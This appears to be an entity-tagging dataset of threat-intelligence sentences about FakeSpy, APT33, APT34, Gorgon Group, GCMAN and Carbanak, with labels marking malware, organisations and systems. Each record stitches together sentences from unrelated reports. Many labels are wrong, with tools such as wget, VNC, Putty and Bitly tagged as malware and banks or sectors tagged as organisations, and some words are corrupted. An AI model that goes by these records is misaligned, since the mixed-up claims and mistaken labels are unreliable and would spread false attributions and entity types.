Magic Hound has primarily targeted organizations in the energy, government, and technology sectors that are either based or have business interests in Saudi Arabia. Since at least 2013, the Iranian threat group that FireEye tracks as APT33 has carried out a cyber espionage operation to collect information from defense, aerospace and petrochemical organizations.

The Gamaredon Group primarily makes use of compromised domains, dynamic DNS providers, Russian and Ukrainian country code top-level domains (ccTLDs), and Russian hosting providers to distribute their custom-built malware.
Gallmaker may well have continued to avoid detection were it not for Symantec's technology. In this instance, Symantec identified the specific PowerShell commands used by Gallmaker as suspicious, leading to the discovery of this new campaign.

Code improvements, new capabilities, anti-emulation techniques, and new, global targets all suggest that this malware is well-maintained by its authors and continues to evolve.

CTU researchers observed likely unsuccessful phishing campaigns being followed by highly targeted spearphishing and social engineering attacks from a threat actor using the name Mia Ash. CTU researchers conclude that COBALT GYPSY created the persona to gain unauthorized access to targeted computer networks via social engineering.
Without Symantec 's advanced AI-based capabilities , Gallmaker 's activities may well have remained undetected .", "spans": [{"start": 60, "end": 67, "label": "Malware"}, {"start": 201, "end": 208, "label": "Malware"}, {"start": 233, "end": 237, "label": "Organization"}, {"start": 264, "end": 276, "label": "Organization"}, {"start": 388, "end": 396, "label": "Organization"}, {"start": 433, "end": 442, "label": "Organization"}]} {"text": "Conclusions Cybereason Mobile Detects and Stops FakeSpy Indicators of Compromise INTRODUCTION For the past several weeks , Cybereason has been investigating a new version of Android malware dubbed FakeSpy , which was first identified in October 2017 and reported again in October 2018 . \bCharacterized by relatively unsophisticated technical merit and extensive use of spear phishing , the Magic Hound targeted individuals and organizations in the Middle East (including targets inside Iran itself) , as well as across Europe and in the United States . Previously , LookingGlass reported on a campaign they named \" Operation Armageddon \" , targeting individuals involved in the Ukrainian military and national security establishment .", "spans": [{"start": 12, "end": 29, "label": "Organization"}, {"start": 48, "end": 55, "label": "Malware"}, {"start": 123, "end": 133, "label": "Organization"}, {"start": 174, "end": 181, "label": "System"}, {"start": 197, "end": 204, "label": "Malware"}, {"start": 390, "end": 401, "label": "Organization"}, {"start": 566, "end": 578, "label": "Organization"}, {"start": 688, "end": 696, "label": "Organization"}]} {"text": "A new campaign is up and running using newly improved , significantly more powerful malware as compared to previous versions . These malware families have a rich history of being used in many targeted attacks against government and private organizations . 
The earliest discovered sample ( based on compile times and sandbox submission times ) distributed by this threat group resembles the descriptions of Gamaredon provided by Symantec and Trend Micro .", "spans": [{"start": 133, "end": 140, "label": "Malware"}, {"start": 217, "end": 227, "label": "Organization"}, {"start": 232, "end": 239, "label": "Organization"}, {"start": 240, "end": 253, "label": "Organization"}, {"start": 406, "end": 415, "label": "Organization"}, {"start": 428, "end": 436, "label": "Organization"}, {"start": 441, "end": 452, "label": "Organization"}]} {"text": "FakeSpy is under active development and is evolving rapidly ; new versions are released every week with additional evasion techniques and capabilities . The activity surfaced in Southeast Asia , a region where APT10 frequently operates . The scripts would also use wget to send POST requests to command and control ( C2 ) servers that would contain information about the compromised system .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 210, "end": 215, "label": "Organization"}, {"start": 265, "end": 269, "label": "Malware"}, {"start": 317, "end": 319, "label": "System"}]} {"text": "Our analysis shows that the threat actor behind the FakeSpy malware is a Chinese-speaking group , commonly referred to as \" Roaming Mantis '' , a group that is known to have launched similar campaigns in the past . The samples we analyzed originated from the Philippines . These VNC exectuables would either be included in the SFX file or downloaded by the batch script .", "spans": [{"start": 52, "end": 59, "label": "Malware"}, {"start": 124, "end": 138, "label": "Organization"}, {"start": 219, "end": 226, "label": "Malware"}, {"start": 279, "end": 282, "label": "Malware"}]} {"text": "FakeSpy is an information stealer that exfiltrates and sends SMS messages , steals financial and application data , reads account information and contact lists , and more . 
APT10 frequently targets the Southeast Asia region . The batch script would then attempt to have the VNC program connect to a command and control ( C2 ) server to enable the server to control the compromised system .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 173, "end": 178, "label": "Organization"}, {"start": 274, "end": 277, "label": "Malware"}, {"start": 321, "end": 323, "label": "System"}]} {"text": "The malware uses smishing , or SMS phishing , to infiltrate target devices , which is a technique that relies on social engineering . Both of the loader\u2019s variants and their various payloads that enSilo analyzed share similar Tactics , Techniques , and Procedures (TTPs) and code associated with APT10 . While the most recent samples observed still use batch scripts and SFX files , the Gamaredon Group has moved aACT from applications like wget , Remote Manipulator MAL , VNC and ChkFlsh.exe .", "spans": [{"start": 196, "end": 202, "label": "Organization"}, {"start": 296, "end": 301, "label": "Organization"}, {"start": 353, "end": 366, "label": "Malware"}, {"start": 371, "end": 380, "label": "Malware"}, {"start": 387, "end": 402, "label": "Organization"}, {"start": 441, "end": 445, "label": "Malware"}, {"start": 448, "end": 470, "label": "Malware"}, {"start": 473, "end": 476, "label": "Malware"}, {"start": 481, "end": 492, "label": "Malware"}]} {"text": "The attackers send fake text messages to lure the victims to click on a malicious link . Typically , APT10 tends to employ a namesquatting scheme in their domains that aims to confuse the observer by posing as a legitimate domain . 
The threat group using these implants has been active since at least 2014 and has been seen targeting individuals likely involved in the Ukrainian government .", "spans": [{"start": 101, "end": 106, "label": "Organization"}, {"start": 379, "end": 389, "label": "Organization"}]} {"text": "The link directs them to a malicious web page , which prompts them to download an Android application package ( APK ) . Also , the certificate embedded in the Quasar sample was issued at 22.12.2018 , which correlates with the file\u2019s compilation date . Some of the samples share delivery mechanisms and infrastructure with samples which are detected by a few antivirus vendors as Gamaredon .", "spans": [{"start": 166, "end": 172, "label": "Malware"}, {"start": 379, "end": 388, "label": "Organization"}]} {"text": "This most recent FakeSpy campaign appears to target users of postal services around the world . Over the past three months , Recorded Future\u2019s Insikt Group has observed an increase in APT33\u2019s also known as Elfin infrastructure building and targeting activity , and on June 21 , 2019 , Yahoo . Periodically , researchers at Palo Alto Networks hunt through WildFire execution reports , using AutoFocus , to identify untagged samples ' artifacts in the hopes of identifying previously undiscovered malware families , behaviors , and campaigns .", "spans": [{"start": 17, "end": 24, "label": "Malware"}, {"start": 125, "end": 142, "label": "Organization"}, {"start": 184, "end": 191, "label": "Organization"}, {"start": 206, "end": 211, "label": "Organization"}, {"start": 323, "end": 341, "label": "Organization"}, {"start": 355, "end": 363, "label": "Organization"}]} {"text": "New versions of FakeSpy masquerade as government post office apps and transportation services apps . News reported that the U.S. Cyber Command launched cyberattacks on an Iranian spy group . 
Just a few months later , in February 2015 , we announced the discovery of Carbanak , a cyber-criminal gang that used custom malware and APT techniques to steal millions of dollars while infecting hundreds of financial institutions in at least 30 countries .", "spans": [{"start": 16, "end": 23, "label": "Malware"}, {"start": 124, "end": 134, "label": "Organization"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 266, "end": 274, "label": "Malware"}, {"start": 279, "end": 298, "label": "Organization"}, {"start": 400, "end": 422, "label": "Organization"}]} {"text": "Our analysis indicates that the threat actors are no longer limiting their campaigns to East Asian countries , but are targeting additional countries around the world . Iranian state-sponsored threat actor APT33 has been conducting cyberespionage activity since at least 2013 , predominantly targeting nations in the Middle East , but also notably targeting U.S. , South Korean , and European commercial entities across a wide variety of sectors . Today at the Security Analyst Summit ( SAS 2016 ) , Kaspersky Lab is announcing the discovery of two new gangs engaged in APT-style bank robberies \u2013 Metel and GCMAN \u2013 and the reemergence of the Carbanak group with new targets in its sights .", "spans": [{"start": 206, "end": 211, "label": "Organization"}, {"start": 461, "end": 484, "label": "Organization"}, {"start": 487, "end": 490, "label": "Organization"}, {"start": 500, "end": 513, "label": "Organization"}, {"start": 580, "end": 584, "label": "Organization"}, {"start": 597, "end": 602, "label": "Organization"}, {"start": 607, "end": 612, "label": "Organization"}, {"start": 642, "end": 656, "label": "Organization"}]} {"text": "THREAT ANALYSIS Infection Vector : Smishing Your Device Thus far , FakeSpy campaigns are characterized by SMS phishing ( a.k.a . 
Our research found that APT33 , or a closely aligned threat actor , continues to conduct and prepare for widespread cyberespionage activity , with over 1 , 200 domains used since March 28 , 2019 and with a strong emphasis on using commodity malware . In 2015 , Kaspersky Lab researchers conducted Incident Response for 29 organizations located in Russia and infected by these three groups .", "spans": [{"start": 67, "end": 74, "label": "Malware"}, {"start": 153, "end": 158, "label": "Organization"}, {"start": 390, "end": 403, "label": "Organization"}, {"start": 511, "end": 517, "label": "Organization"}]} {"text": "smishing ) . The targeting of mainly Saudi Arabian organizations across a wide variety of industries aligns with historical targeting patterns for the group , which appear undeterred following previous expos\u00e9s of their activity . Kaspersky Lab is releasing crucial Indicators of Compromise ( IOCs ) and other data to help organizations search for traces of these attack groups in their corporate networks .", "spans": [{"start": 151, "end": 156, "label": "Organization"}, {"start": 230, "end": 243, "label": "Organization"}, {"start": 363, "end": 376, "label": "Organization"}]} {"text": "These SMS messages masquerade as a message from the local post office and link to the FakeSpy download . Towards the end of April 2019 , we tracked down what we believe to be new activity by APT10 , a Chinese cyber espionage group . 
In all , Kaspersky Lab discovered Metel in more than 30 financial institutions .", "spans": [{"start": 86, "end": 93, "label": "Malware"}, {"start": 191, "end": 196, "label": "Organization"}, {"start": 225, "end": 230, "label": "Organization"}, {"start": 242, "end": 255, "label": "Organization"}, {"start": 267, "end": 272, "label": "Organization"}, {"start": 289, "end": 311, "label": "Organization"}]} {"text": "In a previous campaign reported by JPCERT , mobile users were alerted by phishy messages containing \u201c delivery updates \u201d purportedly from Sagawa Express . Almost 60% of the suspected APT33 domains that were classified to malware families related to njRAT infections , a RAT not previously associated with APT33 activity . It is highly likely that this threat is far more widespread and we urge financial institutions around the world to scan their networks for signs of the Metel malware .", "spans": [{"start": 35, "end": 41, "label": "Organization"}, {"start": 138, "end": 152, "label": "Organization"}, {"start": 183, "end": 188, "label": "Organization"}, {"start": 249, "end": 254, "label": "System"}, {"start": 305, "end": 310, "label": "Organization"}, {"start": 394, "end": 416, "label": "Organization"}, {"start": 474, "end": 479, "label": "Malware"}, {"start": 480, "end": 487, "label": "Malware"}]} {"text": "Fake SMS message luring users to enter a fake website , which contains the malicious APK ( JPCERT report ) . Other commodity RAT malware families , such as AdwindRAT and RevengeRAT , were also linked to suspected APT33 domain activity . 
A second group , which we call GCMAN because the malware is based on code compiled on the GCC compiler , emerged recently using similar techniques to the Metel Group to infect banking institutions and attempt to transfer money to e-currency services .", "spans": [{"start": 91, "end": 97, "label": "Organization"}, {"start": 156, "end": 165, "label": "System"}, {"start": 170, "end": 180, "label": "System"}, {"start": 213, "end": 218, "label": "Organization"}, {"start": 268, "end": 273, "label": "Organization"}, {"start": 391, "end": 402, "label": "Organization"}, {"start": 413, "end": 433, "label": "Organization"}]} {"text": "Clicking the SMS link brings the user to a fake website that prompts them to download and install the FakeSpy APK , which is masquerading as a local postal service app . APT33 is an Iranian state-sponsored threat actor that has engaged in cyberespionage activities since at least 2013 . Our investigations revealed that the attackers drove around several cities in Russia , stealing money from ATMs belonging to different banks .", "spans": [{"start": 102, "end": 109, "label": "Malware"}, {"start": 170, "end": 175, "label": "Organization"}, {"start": 324, "end": 333, "label": "Organization"}, {"start": 422, "end": 427, "label": "Organization"}]} {"text": "Targeting Postal and Transportation Services Companies One of the most significant findings is that new versions of FakeSpy target not only Korean and Japanese speakers , but also almost any postal service company around the world . Western and Saudi organizations in industries that have been historically targeted by APT33 should be monitoring geopolitical developments and increasing the scrutiny of operational security controls focusing on detection and remediation of initial unauthorized access , specifically from phishing campaigns , webshells . 
Once inside the network , the GCMAN group uses legitimate and penetration testing tools such as Putty , VNC , and Meterpreter for lateral movement .", "spans": [{"start": 116, "end": 123, "label": "Malware"}, {"start": 319, "end": 324, "label": "Organization"}, {"start": 585, "end": 596, "label": "Organization"}, {"start": 651, "end": 656, "label": "Malware"}, {"start": 659, "end": 662, "label": "Malware"}, {"start": 669, "end": 680, "label": "Malware"}]} {"text": "Example of more recent FakeSpy campaigns targeting France . Symantec\u2019s Elfin report denoted additional targeting of the engineering , chemical , research , finance , IT , and healthcare sectors . Our investigation revealed an attack where the GCMAN group then planted a cron script into bank 's server , sending financial transactions at the rate of $200 per minute .", "spans": [{"start": 23, "end": 30, "label": "Malware"}, {"start": 60, "end": 70, "label": "Organization"}, {"start": 71, "end": 76, "label": "Organization"}, {"start": 120, "end": 131, "label": "Organization"}, {"start": 134, "end": 142, "label": "Organization"}, {"start": 175, "end": 185, "label": "Organization"}, {"start": 243, "end": 254, "label": "Organization"}, {"start": 287, "end": 291, "label": "Organization"}]} {"text": "New FakeSpy campaign applications leveraging fake postal services apps . We assess that the recent reporting on links between the Nasr Institute and Kavosh Security Group , as well as technical and persona analysis , overlaps among APT33 , APT35 , and MUDDYWATER , and is probably a result of the tiered structure that Iran utilizes to manage cyber operations . 
The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 130, "end": 144, "label": "Organization"}, {"start": 165, "end": 170, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}, {"start": 240, "end": 245, "label": "Organization"}, {"start": 252, "end": 262, "label": "Organization"}, {"start": 366, "end": 377, "label": "Organization"}, {"start": 444, "end": 448, "label": "Organization"}]} {"text": "All recent FakeSpy versions contain the same code with minor changes . Recorded Future has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . During that time they poked 70 internal hosts , compromised 56 accounts , making their ACT from 139 attack sources ( TOR and compromised home routers ) .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 71, "end": 86, "label": "Organization"}, {"start": 107, "end": 112, "label": "Organization"}]} {"text": "The FakeSpy malware has been found to masquerade as any of the following companies : United States Postal Service - An independent agency of the executive branch of the United States federal government . FireEye also noted in their 2017 report that the online handle xman_1365_x , \u201d found within the PDB path in an APT33 TURNEDUP backdoor sample , belonged to an individual at the Nasr Institute . 
However , in September last year , our friends at CSIS published a blog detailing a new Carbanak variant affecting one of its customers .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 85, "end": 113, "label": "Organization"}, {"start": 204, "end": 211, "label": "Organization"}, {"start": 315, "end": 320, "label": "Organization"}, {"start": 448, "end": 452, "label": "Organization"}, {"start": 486, "end": 494, "label": "Malware"}, {"start": 524, "end": 533, "label": "Organization"}]} {"text": "USPS is the most well-known branch of the US government and provides a publicly funded postal service . Recorded Future\u2019s Insikt Group has been monitoring APT33 activity , beginning with research published in October 2017 , which revealed new infrastructure , malware hashes , and TTPs relating to the threat actor(s) . Kaspersky Lab 's research team responded to three financial institutions in Russia that were infected with the GCMAN malware .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 104, "end": 121, "label": "Organization"}, {"start": 122, "end": 128, "label": "Organization"}, {"start": 129, "end": 134, "label": "Organization"}, {"start": 155, "end": 160, "label": "Organization"}, {"start": 320, "end": 333, "label": "Organization"}, {"start": 370, "end": 392, "label": "Organization"}, {"start": 431, "end": 436, "label": "Malware"}, {"start": 437, "end": 444, "label": "Malware"}]} {"text": "Royal Mail - British postal service and courier company . Based on this information , it is possible that upon the exposure of the Nasr Institute as a front for Iranian state-sponsored offensive cyber activity , employees transitioned over to other entities , such as Kavosh , to protect their identities and minimize further exposure . 
In one remarkable case , the Carbanak 2.0 gang used its access to a financial institution that stores information about shareholders to change the ownership details of a large company .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 131, "end": 135, "label": "Organization"}, {"start": 366, "end": 374, "label": "Malware"}, {"start": 405, "end": 426, "label": "Organization"}]} {"text": "For most of its history it operated as a government department or public corporation . Insikt Group researchers used proprietary methods , including Recorded Future Domain Analysis and Recorded Future Network Traffic Analysis , along with other common analytical approaches , to profile recently reported Iranian threat actor APT33\u2019s domain and hosting infrastructure in an effort to identify recent activity . Recently Subaat drew our attention due to renewed targeted attack activity .", "spans": [{"start": 87, "end": 93, "label": "Organization"}, {"start": 185, "end": 200, "label": "Organization"}, {"start": 326, "end": 333, "label": "Organization"}, {"start": 420, "end": 426, "label": "Organization"}]} {"text": "Deutsche Post - Deutsche Post DHL Group , a German multinational package delivery and supply chain management company headquartered in Bonn . Insikt Group enumerated all domains reported as being used by APT33 since January 2019 . 
Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec , in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking , which we are calling Gorgon Group .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 30, "end": 39, "label": "Organization"}, {"start": 142, "end": 148, "label": "Organization"}, {"start": 204, "end": 209, "label": "Organization"}, {"start": 316, "end": 322, "label": "Organization"}, {"start": 353, "end": 356, "label": "Organization"}, {"start": 361, "end": 367, "label": "Organization"}, {"start": 435, "end": 444, "label": "Organization"}, {"start": 445, "end": 452, "label": "Organization"}, {"start": 507, "end": 519, "label": "Organization"}]} {"text": "La Poste - La Poste is a public limited postal service company in France . PlugX is a modular structured malware that has many different operational plugins such as communication compression and encryption , network enumeration , files interaction , remote shell operations and more . Starting in February 2018 , Palo Alto Networks identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 75, "end": 80, "label": "Malware"}, {"start": 165, "end": 190, "label": "Malware"}, {"start": 195, "end": 205, "label": "Malware"}, {"start": 208, "end": 227, "label": "Malware"}, {"start": 230, "end": 247, "label": "Malware"}, {"start": 250, "end": 273, "label": "Malware"}, {"start": 313, "end": 331, "label": "Organization"}, {"start": 389, "end": 401, "label": "Organization"}, {"start": 412, "end": 438, "label": "Organization"}]} {"text": "Japan Post - A private Japanese post , logistics and courier headquartered in Tokyo . 
Using data from Recorded Future Domain Analysis and combining it with data derived from Recorded Future Network Traffic Analysis , Insikt Group researchers were able to identify a small selection of likely targeted organizations impacted by suspected APT33 activity . Starting in February 2018 , Palo Alto Networks Unit 42 identified a", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 102, "end": 117, "label": "Organization"}, {"start": 217, "end": 229, "label": "Organization"}, {"start": 337, "end": 342, "label": "Organization"}, {"start": 382, "end": 408, "label": "Organization"}]} {"text": "Yamato Transport - One of Japan 's largest door-to-door delivery service companies , also in Tokyo . Following the exposure of a wide range of their infrastructure and operations by Symantec earlier this year , we discovered that APT33 , or closely aligned actors , reacted by either parking or reassigning some of their domain infrastructure . of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": [{"start": 0, "end": 16, "label": "Organization"}, {"start": 182, "end": 190, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 380, "end": 392, "label": "Organization"}, {"start": 403, "end": 429, "label": "Organization"}]} {"text": "Chunghwa Post - The government-owned corporation Chunghwa is the official postal service of Taiwan . Since late March , suspected APT33 threat actors have continued to use a large swath of operational infrastructure , well in excess of 1 , 200 domains , with many observed communicating with 19 different commodity RAT implants . 
The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": [{"start": 0, "end": 13, "label": "Organization"}, {"start": 49, "end": 57, "label": "Organization"}, {"start": 130, "end": 135, "label": "Organization"}, {"start": 315, "end": 318, "label": "System"}, {"start": 334, "end": 345, "label": "Organization"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 394, "end": 403, "label": "Organization"}, {"start": 408, "end": 430, "label": "Organization"}]} {"text": "Swiss Post - The national postal service of Switzerland , a fully state-owned limited company ( AG ) regulated by public law . While we haven\u2019t observed a widespread targeting of commercial entities or regional adversaries like in previously documented APT33 operations , the handful of targeted organizations that we did observe were mainly located in Saudi Arabia across a range of industries , indicating ongoing targeting aligned with geopolitical aims . Starting in February 2018 , Unit 42 identified a campaign of attacks performed by members of Gorgon Group targeting governmental organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": [{"start": 0, "end": 10, "label": "Organization"}, {"start": 133, "end": 135, "label": "Organization"}, {"start": 253, "end": 258, "label": "Organization"}, {"start": 487, "end": 494, "label": "Organization"}, {"start": 552, "end": 564, "label": "Organization"}, {"start": 575, "end": 601, "label": "Organization"}]} {"text": "The fake applications are built using WebView , a popular extension of Android \u2019 s View class that lets the developer show a webpage . The zip contained a sample of the Poison Ivy malware which is also known to be used by APT10 . 
APT38 's increasingly aggressive targeting against banks .", "spans": [{"start": 38, "end": 45, "label": "System"}, {"start": 71, "end": 78, "label": "System"}, {"start": 169, "end": 179, "label": "System"}, {"start": 222, "end": 227, "label": "Organization"}, {"start": 230, "end": 235, "label": "Organization"}, {"start": 281, "end": 286, "label": "Organization"}]} {"text": "FakeSpy uses this view to redirect users to the original post office carrier webpage on launch of the application , continuing the deception . The new malware families , which we will examine later in this post , show APT34 relying on their PowerShell development capabilities , as well as trying their hand at Golang . Gorgon Group used common URL shortening services to download payloads .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 218, "end": 223, "label": "Organization"}, {"start": 241, "end": 251, "label": "System"}, {"start": 320, "end": 332, "label": "Organization"}]} {"text": "This allows the application to appear legitimate , especially given these applications icons and user interface . Additionally , with the assistance of our FireEye Labs Advanced Reverse Engineering (FLARE) , Intelligence , and Advanced Practices teams , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . 
The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques .", "spans": [{"start": 156, "end": 163, "label": "Organization"}, {"start": 227, "end": 245, "label": "Organization"}, {"start": 369, "end": 374, "label": "System"}, {"start": 381, "end": 392, "label": "Organization"}, {"start": 410, "end": 415, "label": "Organization"}, {"start": 441, "end": 450, "label": "Organization"}, {"start": 455, "end": 477, "label": "Organization"}]} {"text": "New FakeSpy applications masquerading as post office apps . This threat group has conducted broad targeting across a variety of industries operating in the Middle East; however , we believe APT34's strongest interest is gaining access to financial , energy , and government entities . APT38 has paralleled North Korea 's worsening financial condition .", "spans": [{"start": 4, "end": 11, "label": "Malware"}, {"start": 72, "end": 77, "label": "Organization"}, {"start": 238, "end": 247, "label": "Organization"}, {"start": 250, "end": 256, "label": "Organization"}, {"start": 263, "end": 273, "label": "Organization"}, {"start": 285, "end": 290, "label": "Organization"}]} {"text": "FAKESPY CODE ANALYSIS Once the user clicks on the malicious link from the SMS message , the app asks them to approve installation from unknown resources . Additionally , with the assistance of FireEye Labs , we identified three new malware families and a reappearance of PICKPOCKET , malware exclusively observed in use by APT34 . 
On much of the C2 infrastructure we identified several crimeware family samples .", "spans": [{"start": 0, "end": 7, "label": "Malware"}, {"start": 193, "end": 205, "label": "Organization"}, {"start": 271, "end": 281, "label": "System"}, {"start": 323, "end": 328, "label": "Organization"}, {"start": 346, "end": 348, "label": "System"}]} {"text": "This configuration can be toggled on by going to \u2018 Settings \u2019 - > \u2018 Security \u2019 - > \u2018 Unknown Resources \u2019 . APT34 is an Iran-nexus cluster of cyber espionage activity that has been active since at least 2014 . While investigating the domains and infrastructure used by the phishing components of Gorgon Group , Unit 42 researchers witnessed several common operational security flaws with Gorgon Group 's actors throughout their many campaigns .", "spans": [{"start": 107, "end": 112, "label": "Organization"}, {"start": 295, "end": 307, "label": "Organization"}, {"start": 310, "end": 317, "label": "Organization"}, {"start": 387, "end": 409, "label": "Organization"}]} {"text": "PackageInstaller shows the app \u2019 s permission access and asks for the user 's approval , which then installs the application . This CPE was created to ensure our customers are updated with new discoveries , activity and detection efforts related to this campaign , along with other recent activity from Iranian-nexus threat actors to include APT33 , which is mentioned in this updated FireEye blog post . 360 and Tuisec already identified some Gorgon Group members .", "spans": [{"start": 342, "end": 347, "label": "Organization"}, {"start": 385, "end": 392, "label": "Organization"}, {"start": 405, "end": 408, "label": "Organization"}, {"start": 413, "end": 419, "label": "Organization"}, {"start": 444, "end": 456, "label": "Organization"}, {"start": 457, "end": 464, "label": "Organization"}]} {"text": "This analysis dissects FakeSpy \u2019 s Chunghwa Post app version , which emerged in April 2020 . 
On June 19 , 2019 , FireEye\u2019s Managed Defense Security Operations Center received an exploit detection alert on one of our FireEye Endpoint Security appliances . RATs such as NjRat and infostealers like Lokibot were leveraging the same C2 infrastructure as that of the targeted attacks .", "spans": [{"start": 23, "end": 30, "label": "Malware"}, {"start": 113, "end": 122, "label": "Organization"}, {"start": 216, "end": 223, "label": "Organization"}, {"start": 255, "end": 259, "label": "Malware"}, {"start": 268, "end": 273, "label": "Malware"}, {"start": 296, "end": 303, "label": "Malware"}, {"start": 329, "end": 331, "label": "System"}]} {"text": "During the installation , the malware asks for the following permissions : READ_PHONE_STATE - Allows read-only access to the phone state , including the current cellular network information , the status of any ongoing calls , and a list of any PhoneAccounts registered on the device . A backdoor that communicates with a single command and control (C2) server using HTTP GET and POST requests , TONEDEAF supports collecting system information , uploading and downloading of files , and arbitrary shell command execution . it 's not known if the attackers physically reside in Pakistan .", "spans": [{"start": 395, "end": 403, "label": "Malware"}, {"start": 413, "end": 442, "label": "Malware"}, {"start": 445, "end": 454, "label": "Malware"}, {"start": 459, "end": 470, "label": "Malware"}, {"start": 486, "end": 495, "label": "Malware"}, {"start": 545, "end": 554, "label": "Organization"}]} {"text": "READ_SMS - Allows the application to read text messages . FireEye\u2019s Advanced Practices and Intelligence teams were able to identify additional artifacts and activity from the APT34 actors at other victim organizations . 
Gorgon used numerous decoy documents and phishing emails , both styles of attacks lacked overall sophistication .", "spans": [{"start": 58, "end": 67, "label": "Organization"}, {"start": 175, "end": 180, "label": "Organization"}, {"start": 197, "end": 217, "label": "Organization"}, {"start": 220, "end": 226, "label": "Organization"}, {"start": 270, "end": 276, "label": "System"}]} {"text": "RECEIVE_SMS - Allows the application to receive SMS messages . Of note , FireEye discovered two additional new malware families hosted at this domain , VALUEVAULT and LONGWATCH . While it 's not known if the attackers physically reside in Pakistan , all members of Gorgon Group purport to be in Pakistan based on their online personas .", "spans": [{"start": 73, "end": 80, "label": "Organization"}, {"start": 152, "end": 162, "label": "Malware"}, {"start": 167, "end": 176, "label": "Malware"}, {"start": 208, "end": 217, "label": "Organization"}, {"start": 265, "end": 277, "label": "Organization"}]} {"text": "WRITE_SMS - Allows the application to write to SMS messages stored on the device or SIM card , including y deleting messages . This tool was previously observed during a Mandiant incident response in 2018 and , to date , solely utilized by APT34 . Starting in mid-February , Unit 42 researchers have been tracking an active campaign sharing a significant portion of infrastructure leveraged by Gorgon Group for criminal and targeted attacks .", "spans": [{"start": 132, "end": 136, "label": "System"}, {"start": 240, "end": 245, "label": "Organization"}, {"start": 275, "end": 282, "label": "Organization"}, {"start": 394, "end": 406, "label": "Organization"}]} {"text": "SEND_SMS - Allows the application to send SMS messages . PICKPOCKET is a credential theft tool that dumps the user's website login credentials from Chrome , Firefox , and Internet Explorer to a file . 
Unit 42 researchers have been tracking Gorgon Group for criminal and targeted attacks .", "spans": [{"start": 57, "end": 67, "label": "Malware"}, {"start": 100, "end": 105, "label": "Malware"}, {"start": 201, "end": 208, "label": "Organization"}, {"start": 240, "end": 252, "label": "Organization"}]} {"text": "INTERNET - Allows the application to open network sockets . FireEye detects this activity across our platforms , including named detection for TONEDEAF , VALUEVAULT , and LONGWATCH . As part of the investigation , Unit 42 researchers were able to identify an interesting characteristic about how the Gorgon Group crew uses shared infrastructure between cybercrime and targeted attacks .", "spans": [{"start": 60, "end": 67, "label": "Organization"}, {"start": 143, "end": 151, "label": "Malware"}, {"start": 154, "end": 164, "label": "Malware"}, {"start": 171, "end": 180, "label": "Malware"}, {"start": 214, "end": 221, "label": "Organization"}, {"start": 300, "end": 312, "label": "Organization"}, {"start": 323, "end": 344, "label": "Malware"}]} {"text": "WRITE_EXTERNAL_STORAGE - Allows the application to write to external storage . Several spear-phishing campaigns attributed to Carbanak , all occurring between March and May 2018 , were analyzed by security researchers in 2018 . The crew combines both regular crime and targeted attack objectives using the same domain infrastructure over time , rarely changing their TTPs .", "spans": [{"start": 126, "end": 134, "label": "Organization"}, {"start": 311, "end": 332, "label": "Malware"}]} {"text": "READ_EXTERNAL_STORAGE - Allows the application to read from external storage . One of the most prolific APT-style cyberattacks , specifically targeting the financial sector , is known as Carbanak . 
One interesting note about the criminal activity of Gorgon Group is their usage of Bitly .", "spans": [{"start": 156, "end": 165, "label": "Organization"}, {"start": 187, "end": 195, "label": "Organization"}, {"start": 250, "end": 262, "label": "Organization"}, {"start": 281, "end": 286, "label": "Malware"}]} {"text": "RECEIVE_BOOT_COMPLETED - Allows the application to receive a broadcast after the system finishes booting . Discovered in 2014 , the campaign quickly gained notoriety after compromising the security systems of 100 banks in 40 countries and stealing up to $1 billion in the process . Between April 1 , 2018 and May 30 , 2018 , we observed the domain stevemike-fireforce.info used in a Gorgon Group cybercrime campaign involving more than 2,300 emails and 19 documents in the initial attack .", "spans": [{"start": 213, "end": 218, "label": "Organization"}, {"start": 442, "end": 448, "label": "System"}]} {"text": "GET_TASKS - Allows the application to get information about current or recently run tasks . The same group is believed to have also been using the Cobalt Strike framework to run sophisticated campaigns , plotting and performing financial heists of financial institutions . Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains .", "spans": [{"start": 101, "end": 106, "label": "Organization"}, {"start": 161, "end": 170, "label": "System"}, {"start": 228, "end": 237, "label": "Organization"}, {"start": 317, "end": 329, "label": "Organization"}, {"start": 340, "end": 345, "label": "Malware"}, {"start": 381, "end": 383, "label": "System"}]} {"text": "( deprecated in API level 21 ) SYSTEM_ALERT_WINDOW - Allows the application to create windows shown on top of all other apps . 
